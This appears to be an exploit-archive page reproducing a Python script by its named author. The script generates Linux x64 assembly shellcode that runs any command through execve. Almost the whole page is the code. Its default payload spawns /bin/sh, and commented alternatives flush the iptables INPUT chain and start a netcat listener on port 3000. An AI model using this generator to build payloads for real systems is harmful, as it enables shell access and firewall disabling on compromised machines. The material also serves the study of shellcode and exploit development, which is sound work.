linuxx64 x64 assembly shellcode (generator)

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linuxx64 x64 assembly shellcode (generator) Code Code...
#!/usr/bin/env python # # Features: # - Linux shellcode x64 assembly code generation # - stack based (smaller payload size) # - execve based # - supports long commands (meaning bigger than an x64 register - 64 bits) # - supports long parameters (meaning bigger than an x64 register - 64 bits) # - one command only (execve will alter the current memory proc and when it exits there's no continuation) # - supports command with up to 8 parameters # # Instructions # - requires full path to the command # - only one command is supported due to execve transforming the current process into a new one, loosing all previous context (any other instructions that would have been executed) # - after having the x64 generated assembly code: # - copy paste it into a file (in a Linux environment) - example.nasm # - execute: # nasm -felf64 example.nasm -o example.o && ld example.o -o example # # Author: Andre Lima @0x4ndr3 # # ######## command = "/bin/sh" #command = "/sbin/iptables -F INPUT" #command = "/bin/nc -lvp 3000" #command = "/bin/echo 1 2 3 4 5 6 7 longparamparamparam" def tohex(val, nbits): return hex((val + (1 << nbits)) % (1 << nbits)) code = "" code += "global _start\n" code += "section .text\n" code += "\n" code += "_start:\n" code += "push 59\n" code += "pop rax\n" code += "cdq\n" code += "push rdx\n" params = command.split(' ') try: params.remove('') # in case of multiple spaces in between params in the command - cleanup except: # it throws an exception if it doesn't finds one pass if len(params[0]) % 8 != 0: command = "/"*(8-len(params[0])%8) + params[0] iters = len(command)/8 - 1 while iters >= 0: block = command[iters*8:iters*8+8] code += "mov rbx, 0x" + block[::-1].encode("hex") + "\n" code += "push rbx\n" iters -= 1 code += "push rsp\n" code += "pop rdi\n" aux_regs = ["r8","r9","r10","r11","r12","r13","r14","r15"] i = 0 params = params[1:] # remove first element - command itself. we just want the params if len(params) > len(aux_regs): print "More than " + str(len(aux_regs)) + " parameters... Unsupported." exit(1) for p in params: code += "push rdx\n" if len(p) % 8 != 0: p += "\x00"*(8-len(p)%8) iters = len(p)/8 -1 while iters >= 0: # each param block = p[iters*8:iters*8+8] code += "mov rbx, 0x" + tohex(~int(block[::-1].encode("hex"),16),64)[2:2+16] + "\n" code += "not rbx\n" code += "push rbx\n" iters -= 1 code += "push rsp\n" code += "pop " + aux_regs[i] + "\n" i += 1 code += "push rdx\n" code += "push rsp\n" code += "pop rdx\n" while i>0: i -= 1 code += "push " + aux_regs[i] + "\n" code += "push rdi\n" code += "push rsp\n" code += "pop rsi\n" code += "syscall\n" print code

Linuxx64 x64 assembly shellcode (generator) Vulnerability / Exploit Source : Linuxx64 x64 assembly shellcode (generator)

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